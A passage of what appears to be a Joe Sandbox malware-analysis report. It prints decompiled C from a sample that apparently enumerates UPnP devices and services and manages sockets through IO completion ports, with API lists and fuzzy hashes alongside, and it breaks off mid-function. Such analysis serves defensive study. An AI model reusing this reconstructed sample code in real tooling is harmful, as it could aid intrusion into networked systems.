                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                  • String ID: device$deviceType
                                                                                                                                                                                                                                                                  • API String ID: 1602765415-3511266565
                                                                                                                                                                                                                                                                  • Opcode ID: fe87e6628fcac155b9e879abce0148de49b56393ca47e6d93c48dfd4937e9403
                                                                                                                                                                                                                                                                  • Instruction ID: 946d26c0edd9c36ec89eb3e0069362279d3cced2e82af026dca6f4f88739a964
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe87e6628fcac155b9e879abce0148de49b56393ca47e6d93c48dfd4937e9403
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3341F975A0020ADFCB14DF98C884BAFB7B9BF48304F108669E515B73A0D778AA45CF95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                                                                                                                                  			E0040C420(intOrPtr* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                                                  				char _v8;
                                                                                                                                                                                                                                                                  				WCHAR* _v12;
                                                                                                                                                                                                                                                                  				WCHAR* _v16;
                                                                                                                                                                                                                                                                  				void* _v20;
                                                                                                                                                                                                                                                                  				WCHAR* _v24;
                                                                                                                                                                                                                                                                  				intOrPtr* _v28;
                                                                                                                                                                                                                                                                  				WCHAR* _v32;
                                                                                                                                                                                                                                                                  				intOrPtr* _t65;
                                                                                                                                                                                                                                                                  				void* _t99;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_push( &_v8);
                                                                                                                                                                                                                                                                  				_push(_a4);
                                                                                                                                                                                                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                                                                                                                                                                                                  					_v16 = 0;
                                                                                                                                                                                                                                                                  					while(_v16 < _v8) {
                                                                                                                                                                                                                                                                  						_v20 = 0;
                                                                                                                                                                                                                                                                  						_push( &_v20);
                                                                                                                                                                                                                                                                  						_push(_v16);
                                                                                                                                                                                                                                                                  						_push(_a4);
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                                                                                                                                                                                                  							L21:
                                                                                                                                                                                                                                                                  							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                  							continue;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_v24 = 0;
                                                                                                                                                                                                                                                                  							_push( &_v24);
                                                                                                                                                                                                                                                                  							_push(_v20);
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                                                                                                                                                                                                  								if(lstrcmpiW(_v24, L"service") == 0) {
                                                                                                                                                                                                                                                                  									_t65 = E0040BF20(_v20, L"serviceType");
                                                                                                                                                                                                                                                                  									_t99 = _t99 + 8;
                                                                                                                                                                                                                                                                  									_v28 = _t65;
                                                                                                                                                                                                                                                                  									if(_v28 != 0) {
                                                                                                                                                                                                                                                                  										_v32 = 0;
                                                                                                                                                                                                                                                                  										_push( &_v32);
                                                                                                                                                                                                                                                                  										_push(_v28);
                                                                                                                                                                                                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                                                                                                                                                                                                  											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                                                                                                                                                                                                  												_v12 = _v20;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											__imp__#6(_v32);
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								__imp__#6(_v24);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							if(_v12 == 0) {
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                                                                                                                                                                                                  								goto L21;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L22;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L22:
                                                                                                                                                                                                                                                                  				return _v12;
                                                                                                                                                                                                                                                                  			}












                                                                                                                                                                                                                                                                  0x0040c426
                                                                                                                                                                                                                                                                  0x0040c42d
                                                                                                                                                                                                                                                                  0x0040c437
                                                                                                                                                                                                                                                                  0x0040c440
                                                                                                                                                                                                                                                                  0x0040c448
                                                                                                                                                                                                                                                                  0x0040c458
                                                                                                                                                                                                                                                                  0x0040c46a
                                                                                                                                                                                                                                                                  0x0040c476
                                                                                                                                                                                                                                                                  0x0040c480
                                                                                                                                                                                                                                                                  0x0040c484
                                                                                                                                                                                                                                                                  0x0040c48d
                                                                                                                                                                                                                                                                  0x0040c495
                                                                                                                                                                                                                                                                  0x0040c573
                                                                                                                                                                                                                                                                  0x0040c467
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c4a5
                                                                                                                                                                                                                                                                  0x0040c4a5
                                                                                                                                                                                                                                                                  0x0040c4af
                                                                                                                                                                                                                                                                  0x0040c4b8
                                                                                                                                                                                                                                                                  0x0040c4c3
                                                                                                                                                                                                                                                                  0x0040c4e4
                                                                                                                                                                                                                                                                  0x0040c4ef
                                                                                                                                                                                                                                                                  0x0040c4f4
                                                                                                                                                                                                                                                                  0x0040c4f7
                                                                                                                                                                                                                                                                  0x0040c4fe
                                                                                                                                                                                                                                                                  0x0040c500
                                                                                                                                                                                                                                                                  0x0040c50a
                                                                                                                                                                                                                                                                  0x0040c513
                                                                                                                                                                                                                                                                  0x0040c51b
                                                                                                                                                                                                                                                                  0x0040c533
                                                                                                                                                                                                                                                                  0x0040c538
                                                                                                                                                                                                                                                                  0x0040c538
                                                                                                                                                                                                                                                                  0x0040c53f
                                                                                                                                                                                                                                                                  0x0040c53f
                                                                                                                                                                                                                                                                  0x0040c551
                                                                                                                                                                                                                                                                  0x0040c551
                                                                                                                                                                                                                                                                  0x0040c4fe
                                                                                                                                                                                                                                                                  0x0040c557
                                                                                                                                                                                                                                                                  0x0040c557
                                                                                                                                                                                                                                                                  0x0040c561
                                                                                                                                                                                                                                                                  0x0040c571
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c563
                                                                                                                                                                                                                                                                  0x0040c561
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c495
                                                                                                                                                                                                                                                                  0x0040c46a
                                                                                                                                                                                                                                                                  0x0040c578
                                                                                                                                                                                                                                                                  0x0040c57e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,service), ref: 0040C4DC
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C52B
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C53F
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C557
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                  • String ID: service$serviceType
                                                                                                                                                                                                                                                                  • API String ID: 1602765415-3667235276
                                                                                                                                                                                                                                                                  • Opcode ID: 61097aceb2625611fabd3a5b989b159f71deee9e717a61a2438811a1ee708ea0
                                                                                                                                                                                                                                                                  • Instruction ID: 4db9edca9011b541f59a0e3a8f8a08950e70cb3f27b3d3dc9fef26094afeab9d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61097aceb2625611fabd3a5b989b159f71deee9e717a61a2438811a1ee708ea0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8410C75A0021AEFCB14DF98CC94BAFB7B5BF48304F108269E515B73A0D738A985CB95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                                                                                                                  			E0040DCB0(intOrPtr __eax, void* _a4) {
                                                                                                                                                                                                                                                                  				void* __esi;
                                                                                                                                                                                                                                                                  				intOrPtr _t20;
                                                                                                                                                                                                                                                                  				long _t28;
                                                                                                                                                                                                                                                                  				long _t37;
                                                                                                                                                                                                                                                                  				intOrPtr _t45;
                                                                                                                                                                                                                                                                  				struct _CRITICAL_SECTION* _t48;
                                                                                                                                                                                                                                                                  				long _t49;
                                                                                                                                                                                                                                                                  				void* _t53;
                                                                                                                                                                                                                                                                  				void* _t54;
                                                                                                                                                                                                                                                                  				void* _t55;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t53 = _a4;
                                                                                                                                                                                                                                                                  				_t45 = __eax;
                                                                                                                                                                                                                                                                  				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_t48 = __eax + 0x20;
                                                                                                                                                                                                                                                                  					_t37 = 0;
                                                                                                                                                                                                                                                                  					EnterCriticalSection(_t48);
                                                                                                                                                                                                                                                                  					_t20 =  *((intOrPtr*)(_t45 + 0x38));
                                                                                                                                                                                                                                                                  					if(_t20 != 0) {
                                                                                                                                                                                                                                                                  						while( *((intOrPtr*)(_t20 + 0x260)) != _t53) {
                                                                                                                                                                                                                                                                  							_t20 =  *((intOrPtr*)(_t20 + 0x280));
                                                                                                                                                                                                                                                                  							if(_t20 != 0) {
                                                                                                                                                                                                                                                                  								continue;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L7;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t37 = 1;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L7:
                                                                                                                                                                                                                                                                  					LeaveCriticalSection(_t48);
                                                                                                                                                                                                                                                                  					if(_t37 == 0) {
                                                                                                                                                                                                                                                                  						_t49 = E00408820(0x284);
                                                                                                                                                                                                                                                                  						_t55 = _t54 + 4;
                                                                                                                                                                                                                                                                  						if(_t49 == 0) {
                                                                                                                                                                                                                                                                  							L13:
                                                                                                                                                                                                                                                                  							E00409320(_t53);
                                                                                                                                                                                                                                                                  							return _t49;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_t7 = _t49 + 0x264; // 0x264
                                                                                                                                                                                                                                                                  							 *_t49 = 0x69636c69;
                                                                                                                                                                                                                                                                  							 *(_t49 + 0x260) = _t53;
                                                                                                                                                                                                                                                                  							_a4 = 0x10;
                                                                                                                                                                                                                                                                  							__imp__#5(_t53, _t7,  &_a4);
                                                                                                                                                                                                                                                                  							if(CreateIoCompletionPort( *(_t49 + 0x260),  *(_t45 + 8), _t49, 0) !=  *(_t45 + 8)) {
                                                                                                                                                                                                                                                                  								E00408990(_t49);
                                                                                                                                                                                                                                                                  								_t55 = _t55 + 4;
                                                                                                                                                                                                                                                                  								_t49 = 0;
                                                                                                                                                                                                                                                                  								goto L13;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_t28 = E0040BB80();
                                                                                                                                                                                                                                                                  								_t13 = _t49 + 4; // 0x4
                                                                                                                                                                                                                                                                  								InterlockedExchange(_t13, _t28);
                                                                                                                                                                                                                                                                  								_t14 = _t49 + 0x244; // 0x244
                                                                                                                                                                                                                                                                  								_t15 = _t49 + 8; // 0x8
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t49 + 0x27c)) = _t45;
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t49 + 0x224)) = 0x200;
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t49 + 0x228)) = _t15;
                                                                                                                                                                                                                                                                  								InitializeCriticalSection(_t14);
                                                                                                                                                                                                                                                                  								InterlockedIncrement(_t45 + 0x3c);
                                                                                                                                                                                                                                                                  								E0040DBD0(_t49);
                                                                                                                                                                                                                                                                  								return _t49;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						return 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					return 0;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}













                                                                                                                                                                                                                                                                  0x0040dcb1
                                                                                                                                                                                                                                                                  0x0040dcb6
                                                                                                                                                                                                                                                                  0x0040dcbb
                                                                                                                                                                                                                                                                  0x0040dcc4
                                                                                                                                                                                                                                                                  0x0040dcc8
                                                                                                                                                                                                                                                                  0x0040dcca
                                                                                                                                                                                                                                                                  0x0040dcd0
                                                                                                                                                                                                                                                                  0x0040dcd5
                                                                                                                                                                                                                                                                  0x0040dcd7
                                                                                                                                                                                                                                                                  0x0040dcdf
                                                                                                                                                                                                                                                                  0x0040dce7
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040dce9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040dce7
                                                                                                                                                                                                                                                                  0x0040dceb
                                                                                                                                                                                                                                                                  0x0040dceb
                                                                                                                                                                                                                                                                  0x0040dced
                                                                                                                                                                                                                                                                  0x0040dcee
                                                                                                                                                                                                                                                                  0x0040dcf6
                                                                                                                                                                                                                                                                  0x0040dd09
                                                                                                                                                                                                                                                                  0x0040dd0b
                                                                                                                                                                                                                                                                  0x0040dd10
                                                                                                                                                                                                                                                                  0x0040ddad
                                                                                                                                                                                                                                                                  0x0040ddae
                                                                                                                                                                                                                                                                  0x0040ddbc
                                                                                                                                                                                                                                                                  0x0040dd16
                                                                                                                                                                                                                                                                  0x0040dd1b
                                                                                                                                                                                                                                                                  0x0040dd23
                                                                                                                                                                                                                                                                  0x0040dd29
                                                                                                                                                                                                                                                                  0x0040dd2f
                                                                                                                                                                                                                                                                  0x0040dd37
                                                                                                                                                                                                                                                                  0x0040dd54
                                                                                                                                                                                                                                                                  0x0040dda3
                                                                                                                                                                                                                                                                  0x0040dda8
                                                                                                                                                                                                                                                                  0x0040ddab
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040dd56
                                                                                                                                                                                                                                                                  0x0040dd56
                                                                                                                                                                                                                                                                  0x0040dd5c
                                                                                                                                                                                                                                                                  0x0040dd60
                                                                                                                                                                                                                                                                  0x0040dd66
                                                                                                                                                                                                                                                                  0x0040dd6c
                                                                                                                                                                                                                                                                  0x0040dd70
                                                                                                                                                                                                                                                                  0x0040dd76
                                                                                                                                                                                                                                                                  0x0040dd80
                                                                                                                                                                                                                                                                  0x0040dd86
                                                                                                                                                                                                                                                                  0x0040dd90
                                                                                                                                                                                                                                                                  0x0040dd96
                                                                                                                                                                                                                                                                  0x0040dda1
                                                                                                                                                                                                                                                                  0x0040dda1
                                                                                                                                                                                                                                                                  0x0040dd54
                                                                                                                                                                                                                                                                  0x0040dcf8
                                                                                                                                                                                                                                                                  0x0040dcfe
                                                                                                                                                                                                                                                                  0x0040dcfe
                                                                                                                                                                                                                                                                  0x0040dcbe
                                                                                                                                                                                                                                                                  0x0040dcc1
                                                                                                                                                                                                                                                                  0x0040dcc1

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,0040E1BB,00000000), ref: 0040DCCA
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E1BB,00000000), ref: 0040DCEE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8009284dbeec5a339d93d4e9847d0904cb6f8aee2ef6e07f75fb7e1dd5454a0f
                                                                                                                                                                                                                                                                  • Instruction ID: 92082c62fa9631858f637837eb2946efbfd8580dbf5aa9204641a4763d3c3573
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8009284dbeec5a339d93d4e9847d0904cb6f8aee2ef6e07f75fb7e1dd5454a0f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D31F1726002059BD320ABB5ED48A97B3E8FF40724F00453EE54AE7681DB38A808CB99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                                                                                                                                                  			E0040C641() {
                                                                                                                                                                                                                                                                  				void* _t85;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				L0:
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					L0:
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L2:
                                                                                                                                                                                                                                                                  					 *(_t85 - 0x10) = 0;
                                                                                                                                                                                                                                                                  					_push(_t85 - 0x10);
                                                                                                                                                                                                                                                                  					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                                                                                                                                                                                                  					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                                                                                                                                                                                                  						L18:
                                                                                                                                                                                                                                                                  						continue;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						L4:
                                                                                                                                                                                                                                                                  						 *(_t85 - 0x14) = 0;
                                                                                                                                                                                                                                                                  						_push(_t85 - 0x14);
                                                                                                                                                                                                                                                                  						_push( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                                                                                                                                                                                                  							L6:
                                                                                                                                                                                                                                                                  							if(lstrcmpiW( *(_t85 - 0x14), L"device") == 0) {
                                                                                                                                                                                                                                                                  								L7:
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t85 - 0x18)) = E0040BF20( *(_t85 - 0x10), L"deviceType");
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                                                                                                                                                                                                  									L8:
                                                                                                                                                                                                                                                                  									 *(_t85 - 0x1c) = 0;
                                                                                                                                                                                                                                                                  									_push(_t85 - 0x1c);
                                                                                                                                                                                                                                                                  									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                                                                                                                                                                                                  										L10:
                                                                                                                                                                                                                                                                  										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                                                                                                                                                                                                  											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										L12:
                                                                                                                                                                                                                                                                  										__imp__#6( *(_t85 - 0x1c));
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									L13:
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							L14:
                                                                                                                                                                                                                                                                  							__imp__#6( *(_t85 - 0x14));
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						L15:
                                                                                                                                                                                                                                                                  						if( *(_t85 - 8) == 0) {
                                                                                                                                                                                                                                                                  							L17:
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                  							goto L18;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					break;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L19:
                                                                                                                                                                                                                                                                  				return  *(_t85 - 8);
                                                                                                                                                                                                                                                                  			}




                                                                                                                                                                                                                                                                  0x0040c641
                                                                                                                                                                                                                                                                  0x0040c641
                                                                                                                                                                                                                                                                  0x0040c641
                                                                                                                                                                                                                                                                  0x0040c647
                                                                                                                                                                                                                                                                  0x0040c650
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c656
                                                                                                                                                                                                                                                                  0x0040c656
                                                                                                                                                                                                                                                                  0x0040c660
                                                                                                                                                                                                                                                                  0x0040c664
                                                                                                                                                                                                                                                                  0x0040c66d
                                                                                                                                                                                                                                                                  0x0040c675
                                                                                                                                                                                                                                                                  0x0040c753
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c685
                                                                                                                                                                                                                                                                  0x0040c685
                                                                                                                                                                                                                                                                  0x0040c685
                                                                                                                                                                                                                                                                  0x0040c68f
                                                                                                                                                                                                                                                                  0x0040c698
                                                                                                                                                                                                                                                                  0x0040c6a3
                                                                                                                                                                                                                                                                  0x0040c6b3
                                                                                                                                                                                                                                                                  0x0040c6c4
                                                                                                                                                                                                                                                                  0x0040c6c6
                                                                                                                                                                                                                                                                  0x0040c6d7
                                                                                                                                                                                                                                                                  0x0040c6de
                                                                                                                                                                                                                                                                  0x0040c6e0
                                                                                                                                                                                                                                                                  0x0040c6e0
                                                                                                                                                                                                                                                                  0x0040c6ea
                                                                                                                                                                                                                                                                  0x0040c6f3
                                                                                                                                                                                                                                                                  0x0040c6fb
                                                                                                                                                                                                                                                                  0x0040c703
                                                                                                                                                                                                                                                                  0x0040c713
                                                                                                                                                                                                                                                                  0x0040c718
                                                                                                                                                                                                                                                                  0x0040c718
                                                                                                                                                                                                                                                                  0x0040c71b
                                                                                                                                                                                                                                                                  0x0040c71f
                                                                                                                                                                                                                                                                  0x0040c71f
                                                                                                                                                                                                                                                                  0x0040c725
                                                                                                                                                                                                                                                                  0x0040c731
                                                                                                                                                                                                                                                                  0x0040c731
                                                                                                                                                                                                                                                                  0x0040c6de
                                                                                                                                                                                                                                                                  0x0040c733
                                                                                                                                                                                                                                                                  0x0040c737
                                                                                                                                                                                                                                                                  0x0040c737
                                                                                                                                                                                                                                                                  0x0040c73d
                                                                                                                                                                                                                                                                  0x0040c741
                                                                                                                                                                                                                                                                  0x0040c745
                                                                                                                                                                                                                                                                  0x0040c751
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c751
                                                                                                                                                                                                                                                                  0x0040c741
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c675
                                                                                                                                                                                                                                                                  0x0040c758
                                                                                                                                                                                                                                                                  0x0040c75e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,device), ref: 0040C6BC
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C70B
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C71F
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C737
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                  • String ID: device$deviceType
                                                                                                                                                                                                                                                                  • API String ID: 1602765415-3511266565
                                                                                                                                                                                                                                                                  • Opcode ID: 8821eec2211d46de2a1f32b3609261cf7a0dfdf6b7a2cf47af531bb2dbcbf3b8
                                                                                                                                                                                                                                                                  • Instruction ID: 532aa4dde8cf7c978606d0783557ede9d9c92c9104aa6674e128487fd0e03548
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8821eec2211d46de2a1f32b3609261cf7a0dfdf6b7a2cf47af531bb2dbcbf3b8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A131DA75A0020ADFCB14DF98C884BAFB7B5BF48304F108669E515B73A0D778AA45CF95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                                                                                                                                                  			E0040C461() {
                                                                                                                                                                                                                                                                  				void* _t85;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				L0:
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					L0:
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L2:
                                                                                                                                                                                                                                                                  					 *(_t85 - 0x10) = 0;
                                                                                                                                                                                                                                                                  					_push(_t85 - 0x10);
